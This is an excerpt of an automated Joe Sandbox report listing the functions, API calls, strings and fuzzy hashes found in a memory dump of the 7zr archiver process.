                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: memset$ExceptionThrowfree
                                • String ID: Split
                                • API String ID: 1404239998-1882502421
                                • Opcode ID: 9945a7de77b5810f93433c37db2fe906020434e7ada0e562ef8328826eb78b10
                                • Instruction ID: e230c0d04d6f95f06933e74ed5fa355abcb57a448b1a1b5c3c700be9d4348637
                                • Opcode Fuzzy Hash: 9945a7de77b5810f93433c37db2fe906020434e7ada0e562ef8328826eb78b10
                                • Instruction Fuzzy Hash: D1424C70E04248DFEF25EFA4C984BADBBB1BF25304F14409AE449A7251CB75AE85CF21
                                APIs
                                • fputs.MSVCRT ref: 00A98437
                                • fputs.MSVCRT ref: 00A98401
                                  • Part of subcall function 00A61FB3: __EH_prolog.LIBCMT ref: 00A61FB8
                                • __EH_prolog.LIBCMT ref: 00A983C4
                                  • Part of subcall function 00A61FA0: fputc.MSVCRT ref: 00A61FA7
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prologfputs$fputc
                                • String ID:
                                • API String ID: 678540050-0
                                • Opcode ID: 00ea98f107a5afa556121498da0128c9087d5a1b4acb43e32e9c3b9c3ae4c29d
                                • Instruction ID: 07d1dbe38a936f2cf3a18d4311fd6cca36adee967389a375333a061d47f05520
                                • Opcode Fuzzy Hash: 00ea98f107a5afa556121498da0128c9087d5a1b4acb43e32e9c3b9c3ae4c29d
                                • Instruction Fuzzy Hash: 9D115E31F045159BCF09BBA0DA13AAEBFB6EF84750F10002AF502A32E1DF6959458BE5
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A82CE0
                                  • Part of subcall function 00A65E10: __EH_prolog.LIBCMT ref: 00A65E15
                                  • Part of subcall function 00A741EC: _CxxThrowException.MSVCRT(?,00B14A58), ref: 00A7421A
                                  • Part of subcall function 00A6965D: VariantClear.OLEAUT32(?), ref: 00A6967F
                                Strings
                                • Cannot create output directory, xrefs: 00A83070
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$ClearExceptionThrowVariant
                                • String ID: Cannot create output directory
                                • API String ID: 814188403-1181934277
                                • Opcode ID: 3a6e8962ab8cea449ca76b893c7729adccf7ec644fa6bab05154913f4a5abaf5
                                • Instruction ID: 811c9eb4635f223b6d286440c934b5617f95b953c4cff2f915a3e9db5f86cd3a
                                • Opcode Fuzzy Hash: 3a6e8962ab8cea449ca76b893c7729adccf7ec644fa6bab05154913f4a5abaf5
                                • Instruction Fuzzy Hash: 91F1BE31900289EFCF25EFA4CA90AEDBFB5BF19300F1480A9E545A7252DB31AE55CB51
                                APIs
                                • fputs.MSVCRT ref: 00A9C840
                                  • Part of subcall function 00A625CB: _CxxThrowException.MSVCRT(?,00B14A58), ref: 00A625ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: ExceptionThrowfputs
                                • String ID:
                                • API String ID: 1334390793-399585960
                                • Opcode ID: cf9034dec0fa0609ef4d1296afb3eefe0916590261186ba76a85e99d79844285
                                • Instruction ID: cfa471c5af6b7456ba3f7a26ad2586fdfe1ff169414ee7a81e41038a6a78335d
                                • Opcode Fuzzy Hash: cf9034dec0fa0609ef4d1296afb3eefe0916590261186ba76a85e99d79844285
                                • Instruction Fuzzy Hash: 9311C4716047449FDB25CF59C8C1BAAFBE6EF49314F04846EE1468B251D7B5BD04C760
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: Open
                                • API String ID: 1795875747-71445658
                                • Opcode ID: 4d289e2eeff7bef6d9582bb5c986004a077cf7972f860ebdeb0b8aeda34d0661
                                • Instruction ID: 6535a3e6661645f1127634de3db94b2d15e3c17f5186d28fe87bcf4b059c086f
                                • Opcode Fuzzy Hash: 4d289e2eeff7bef6d9582bb5c986004a077cf7972f860ebdeb0b8aeda34d0661
                                • Instruction Fuzzy Hash: 80117032605B049FDB21EF34DA91ADABBE5EF64310F54852EE19A83252DB71A904CF50
                                APIs
                                • __EH_prolog.LIBCMT ref: 00AB06B3
                                • _CxxThrowException.MSVCRT(?,00B1D480), ref: 00AB08F2
                                  • Part of subcall function 00A61E0C: malloc.MSVCRT ref: 00A61E1F
                                  • Part of subcall function 00A61E0C: _CxxThrowException.MSVCRT(?,00B14B28), ref: 00A61E39
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: ExceptionThrow$H_prologmalloc
                                • String ID:
                                • API String ID: 3044594480-0
                                • Opcode ID: c348c79ed0fc85260e74cde58ed74a0b4af83346a59b3fad8515ec603b4259fa
                                • Instruction ID: 10baefd579c794aad37d675c08d3f2e81b9bb4891b3a9b637fbdd8e185eabc4c
                                • Opcode Fuzzy Hash: c348c79ed0fc85260e74cde58ed74a0b4af83346a59b3fad8515ec603b4259fa
                                • Instruction Fuzzy Hash: 04913B71900249DFCF21DFA8C981EEEBBB9BF19304F148199E445A7292CB31AE45CF61
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 238d9bf34a2169a8632607f01cd14ff37960db4048e5a86e00c86ea42d44ba5a
                                • Instruction ID: 5e04081b264e3d302c00024cb99d59e47121c2fc3c691050e089c20bba9a3693
                                • Opcode Fuzzy Hash: 238d9bf34a2169a8632607f01cd14ff37960db4048e5a86e00c86ea42d44ba5a
                                • Instruction Fuzzy Hash: F2F1A971A04B858FCF25CF64C990BAABBF1BF19304F58C86EE49E9B211D730A944DB11
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A74255
                                  • Part of subcall function 00A7440B: __EH_prolog.LIBCMT ref: 00A74410
                                  • Part of subcall function 00A61E0C: malloc.MSVCRT ref: 00A61E1F
                                  • Part of subcall function 00A61E0C: _CxxThrowException.MSVCRT(?,00B14B28), ref: 00A61E39
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$ExceptionThrowmalloc
                                • String ID:
                                • API String ID: 3744649731-0
                                • Opcode ID: 0ec99e44916dc1131ba28c3c88faaf69336748ab9a4774aff2108c25c76cabf2
                                • Instruction ID: 8aa6992e9161163141803bc605cdb296c1e95c3dcc7377c3b2f831791ba51bc3
                                • Opcode Fuzzy Hash: 0ec99e44916dc1131ba28c3c88faaf69336748ab9a4774aff2108c25c76cabf2
                                • Instruction Fuzzy Hash: EF51C6B1401B44CFC725DFA9C28469AFFF0BF19304F5588AEC49E97692D7B1A608CB61
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 31cd7a81d169398494e7097d00f9ef4126c435f14801f581d6b3411d24c49e7f
                                • Instruction ID: aeb651d8ff428aed1faff5e2b321f41bb1202f0dabb33632095c5d837a9bd1eb
                                • Opcode Fuzzy Hash: 31cd7a81d169398494e7097d00f9ef4126c435f14801f581d6b3411d24c49e7f
                                • Instruction Fuzzy Hash: 5F313CB0D00209DFCB54EF95C9A1CEEBBB9FF84364B20852DE42A67241D7709D05CBA0
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A8021F
                                  • Part of subcall function 00A73D66: __EH_prolog.LIBCMT ref: 00A73D6B
                                  • Part of subcall function 00A73D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A73D7D
                                  • Part of subcall function 00A73D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A73D94
                                  • Part of subcall function 00A73D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00A73DB6
                                  • Part of subcall function 00A73D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A73DCB
                                  • Part of subcall function 00A73D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A73DD5
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID:
                                • API String ID: 1532160333-0
                                • Opcode ID: 64726aee970b6f164778a1589817f3a2ec610cb83c51e5b7cfe3219d770cfd0e
                                • Instruction ID: 6f53516a200e22e67a8d56f40838b14fbfd18e32a4896f4c1291cd84da2dad60
                                • Opcode Fuzzy Hash: 64726aee970b6f164778a1589817f3a2ec610cb83c51e5b7cfe3219d770cfd0e
                                • Instruction Fuzzy Hash: F62139B1846B90CFC731CF6A86D0686FFF4BB19600B94996ED1DA83B12C370A508CF55
                                APIs
                                • __EH_prolog.LIBCMT ref: 00A9C0B8
                                  • Part of subcall function 00A87193: __EH_prolog.LIBCMT ref: 00A87198
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$free
                                • String ID:
                                • API String ID: 2654054672-0
                                • Opcode ID: 873314bde5f7af7dfd7f01b5e93c0ce88488fb3fb97a69809e1d0be44e868311
                                • Instruction ID: 382a1a80fb6dc6006d30b87e9a6aaab30129c374276626e1300008bc7afa2a57
                                • Opcode Fuzzy Hash: 873314bde5f7af7dfd7f01b5e93c0ce88488fb3fb97a69809e1d0be44e868311
                                • Instruction Fuzzy Hash: 2CF0B472B00711DFDB259B59E9417AEF7E9EF54760F10016FE501A7652CFB1DC108690
                                APIs
                                • __EH_prolog.LIBCMT ref: 00AA0364
                                  • Part of subcall function 00AA01C4: __EH_prolog.LIBCMT ref: 00AA01C9
                                  • Part of subcall function 00AA0143: __EH_prolog.LIBCMT ref: 00AA0148
                                  • Part of subcall function 00A61E40: free.MSVCRT ref: 00A61E44
                                  • Part of subcall function 00AA03D8: __EH_prolog.LIBCMT ref: 00AA03DD
                                  • Part of subcall function 00AA004A: __EH_prolog.LIBCMT ref: 00AA004F
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$free
                                • String ID:
                                • API String ID: 2654054672-0
                                • Opcode ID: 80ab88a1955633c4100a199be6466c97862e57d59bac51ccbfe29f8ad293c96f
                                • Instruction ID: 5d59f6cd939004f69bedd9bcbbe6d405a9720572175124add19e1b84f33db9a8
                                • Opcode Fuzzy Hash: 80ab88a1955633c4100a199be6466c97862e57d59bac51ccbfe29f8ad293c96f
                                • Instruction Fuzzy Hash: 10F0F471A14A54DFCB1AEB68CA227EDBBE4AF01314F10469DE052632D2CBB5AB048754
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: f02721ecca84f3470a17966b0f863cc7f5201883dddaa50b3cecf7340faff95f
                                • Instruction ID: c2263406b867e41dbd011364b9d3479215d66b721ba362afea083d439a29400d
                                • Opcode Fuzzy Hash: f02721ecca84f3470a17966b0f863cc7f5201883dddaa50b3cecf7340faff95f
                                • Instruction Fuzzy Hash: EEF0AF32E0011AABCF00DF98C8408AFBBB8FF84750B00805AF416E7250CB388A05CB90
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID:
                                • API String ID: 1795875747-0
                                • Opcode ID: e910287666dacacf53a67d0d234b8e05d7919c12a2fef786bc5efaeb18e9284a
                                • Instruction ID: 8f869f36d91086e6260d92aab59f11ffb54a473b6a617de595aab3fede6d890f
                                • Opcode Fuzzy Hash: e910287666dacacf53a67d0d234b8e05d7919c12a2fef786bc5efaeb18e9284a
                                • Instruction Fuzzy Hash: 00D01732504129ABCF156B98EC06CDDBBBCEF18254B04442AF941F21A0EBB5EA148BA4
                                APIs
                                • __EH_prolog.LIBCMT ref: 00AB80AF
                                  • Part of subcall function 00A61E0C: malloc.MSVCRT ref: 00A61E1F
                                  • Part of subcall function 00A61E0C: _CxxThrowException.MSVCRT(?,00B14B28), ref: 00A61E39
                                  • Part of subcall function 00AABDB5: __EH_prolog.LIBCMT ref: 00AABDBA
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: H_prolog$ExceptionThrowmalloc
                                • String ID:
                                • API String ID: 3744649731-0
                                • Opcode ID: 97dca68f54ba734401837a106773d4d703c6137fbb7f4afbe6abbd0c13c00610
                                • Instruction ID: ba2d4a7561189a1b9b2b5c90c0973280b036a2b625f28249e045c71c227f0587
                                • Opcode Fuzzy Hash: 97dca68f54ba734401837a106773d4d703c6137fbb7f4afbe6abbd0c13c00610
                                • Instruction Fuzzy Hash: E5D01771B01105AEDB48ABB8952266E76A4AB44340F0049ADA426E3782EF7489008620
                                APIs
                                • FindClose.KERNELBASE(00000000,?,00A66880), ref: 00A66853
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: 860a985849536b9c15b4c9ebd6ebb9cc5bb5f7a91612e74dfc02e84936359bcd
                                • Instruction ID: aee7415dc9e8011a771d51ec284aa8e097ded31564868b7fc139661424c04b8c
                                • Opcode Fuzzy Hash: 860a985849536b9c15b4c9ebd6ebb9cc5bb5f7a91612e74dfc02e84936359bcd
                                • Instruction Fuzzy Hash: 70D0123110422246CA646F3EB8489C637E86E5A3343210B9AF0B0D31E2EB608C839A90
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID:
                                • API String ID: 1795875747-0
                                • Opcode ID: 02661445c34b43ed3b9afb11edca592912190fb4ef163aa5b0a77081112ee8d3
                                • Instruction ID: 94db1bc87a8a54b5bd7ad365b2372a255f32adec488460a7ec6da2dce35ac96d
                                • Opcode Fuzzy Hash: 02661445c34b43ed3b9afb11edca592912190fb4ef163aa5b0a77081112ee8d3
                                • Instruction Fuzzy Hash: 1CD0C936008251AFD6256F05EC09C8BBFB5FFE9320721082FF480921609B626D25DAA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: memmove
                                • String ID:
                                • API String ID: 2162964266-0
                                • Opcode ID: fb015c103b6a7a08755657176b850e4f1c9c632384d36763587f1dcc38bfb36c
                                • Instruction ID: 1597bb4143af2c496a3f734da9d09c38d84dadd90ae487fbf066ed181a9920bd
                                • Opcode Fuzzy Hash: fb015c103b6a7a08755657176b850e4f1c9c632384d36763587f1dcc38bfb36c
                                • Instruction Fuzzy Hash: 77816F75E00249AFCF14CFA8C584AFDBBB1EF48324F14946AD592B7241D775AA80CF54
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                • Instruction ID: 0473174565964a297cf6e23d72382723687cb80d8ccb9085d77790b91345dc13
                                • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                • Instruction Fuzzy Hash: 31D012B165364506DF484F724D4AB6B31942F6035AF288DBCF813CB2D1FB29C6199258
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000), ref: 00AE6B31
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: eb7896293a4fcaa9fc7c7cc9b2e3275420876ac23010af5d67ebf0a0fec89b67
                                • Instruction ID: 4637eb70b4d382a281b98aeb2bd1f843869bd72cc84833bb2975dd546cb58d1b
                                • Opcode Fuzzy Hash: eb7896293a4fcaa9fc7c7cc9b2e3275420876ac23010af5d67ebf0a0fec89b67
                                • Instruction Fuzzy Hash: A3C08CE1A4D280DFDF0213108C407603F208B93300F0A00C1E4045B092D6041C08C722
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                • Instruction ID: ed2619eff212866c0fadedbd8398a484cfea5e4904b5d631117b994bac8841ad
                                • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                • Instruction Fuzzy Hash: 15A024C55110C001DD1C13313C015371400177030F7C00CFC7501C0303F715C1041005
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
